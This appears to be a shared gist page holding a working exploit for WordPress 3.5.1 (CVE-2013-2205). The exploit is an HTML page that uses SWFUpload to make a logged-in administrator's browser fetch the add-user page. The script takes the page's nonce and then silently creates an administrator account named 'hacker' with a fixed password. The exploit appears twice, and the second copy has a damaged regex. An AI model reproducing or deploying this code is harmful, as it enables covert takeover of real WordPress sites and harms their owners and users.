ZoczuS/wp-3.5.1-sploit.html Secret

## wp-3.5.1-sploit.html
<html>
<script type="text/javascript" src="http://wordpress-url/wp-includes/js/swfupload/swfupload-all.js"></script>
<script type="text/javascript">

		var swfu;
		window.onload = function() {
			var settings = {
				flash_url : "http://wordpress-url/wp-includes/js/swfupload/swfupload.swf",
				upload_url: "http://wordlress-url/wp-admin/user-new.php",
				file_size_limit : "5 MB",
				file_types : "*.*",
				file_types_description : "All Files",
				file_upload_limit : 100,
				file_queue_limit : 0,
				custom_settings : {
					progressTarget : "fsUploadProgress",
					cancelButtonId : "btnCancel"
				},
				debug: true,
				// Button settings
				button_width: "65",
				button_height: "29",
				button_placeholder_id: "spanButtonPlaceHolder",
				button_text: 'CLICK',
				button_text_style: ".theFont { font-size: 16; }",
				button_text_left_padding: 12,
				button_text_top_padding: 3,

				file_dialog_complete_handler: startUpload,
				upload_success_handler : myUploadSuccessHandler
			};
			swfu = new SWFUpload(settings);

	     };
function startUpload() {
	swfu.startUpload();
}
function myUploadSuccessHandler (file, serverData,c,d){
	var arr = serverData.split("\n");
	for(a in arr) {
		if(arr[a].search("_wpnonce_create-user") != -1) {
			var nonce = arr[a].replace(/.*value="([a-fA-F0-9]+)".*/, "$1");
			addUser(nonce);
			break;
		}
	}
}
function addUser(nonce) {
	xmlhttp = new XMLHttpRequest();
	xmlhttp.open("POST","http://wordpress-url/wp-admin/user-new.php",true);
	xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
	xmlhttp.withCredentials = "true";
	xmlhttp.send("action=createuser&_wpnonce_create-user=" + nonce + "&_wp_http_referer=%2Fwordpress%2Fwordpress3.5.1%2Fwp-admin%2Fuser-new.php&user_login=hacker&email=hacker%4032s.pl&first_name=hacker&last_name=hacker&url=lol&pass1=qwerty1234&pass2=qwerty1234&role=administrator&createuser=Add+New+User+");

	alert("Thank you. :-)");
}
</script>
</head><body>
<div id="content">
<br>Wordpress 3.5.1 + SWFUpload CVE-2013-2205 Exploit</br>
<br>Bug found by <a href="http://szgru.website.pl/">Szymon Gruszecki</a>
<br>Exploit by <a href="http://ropchain.org">Jakub Zoczek</a>
<hr>
<br>Choose some file to make the magic happens ;-)
<br><span id="spanButtonPlaceHolder"></span>
</div>
</body></html>
	<html>
	<script type="text/javascript" src="http://wordpress-url/wp-includes/js/swfupload/swfupload-all.js"></script>
	<script type="text/javascript">

	var swfu;
	window.onload = function() {
	var settings = {
	flash_url : "http://wordpress-url/wp-includes/js/swfupload/swfupload.swf",
	upload_url: "http://wordlress-url/wp-admin/user-new.php",
	file_size_limit : "5 MB",
	file_types : ".",
	file_types_description : "All Files",
	file_upload_limit : 100,
	file_queue_limit : 0,
	custom_settings : {
	progressTarget : "fsUploadProgress",
	cancelButtonId : "btnCancel"
	},
	debug: true,
	// Button settings
	button_width: "65",
	button_height: "29",
	button_placeholder_id: "spanButtonPlaceHolder",
	button_text: 'CLICK',
	button_text_style: ".theFont { font-size: 16; }",
	button_text_left_padding: 12,
	button_text_top_padding: 3,

	file_dialog_complete_handler: startUpload,
	upload_success_handler : myUploadSuccessHandler
	};
	swfu = new SWFUpload(settings);

	};
	function startUpload() {
	swfu.startUpload();
	}
	function myUploadSuccessHandler (file, serverData,c,d){
	var arr = serverData.split("\n");
	for(a in arr) {
	if(arr[a].search("_wpnonce_create-user") != -1) {
	var nonce = arr[a].replace(/.value="([a-fA-F0-9]+)"./, "$1");
	addUser(nonce);
	break;
	}
	}
	}
	function addUser(nonce) {
	xmlhttp = new XMLHttpRequest();
	xmlhttp.open("POST","http://wordpress-url/wp-admin/user-new.php",true);
	xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
	xmlhttp.withCredentials = "true";
	xmlhttp.send("action=createuser&_wpnonce_create-user=" + nonce + "&_wp_http_referer=%2Fwordpress%2Fwordpress3.5.1%2Fwp-admin%2Fuser-new.php&user_login=hacker&email=hacker%4032s.pl&first_name=hacker&last_name=hacker&url=lol&pass1=qwerty1234&pass2=qwerty1234&role=administrator&createuser=Add+New+User+");

	alert("Thank you. :-)");
	}
	</script>
	</head><body>
	<div id="content">
	<br>Wordpress 3.5.1 + SWFUpload CVE-2013-2205 Exploit</br>
	<br>Bug found by <a href="http://szgru.website.pl/">Szymon Gruszecki</a>
	<br>Exploit by <a href="http://ropchain.org">Jakub Zoczek</a>
	<hr>
	<br>Choose some file to make the magic happens ;-)
	<br><span id="spanButtonPlaceHolder"></span>
	</div>
	</body></html>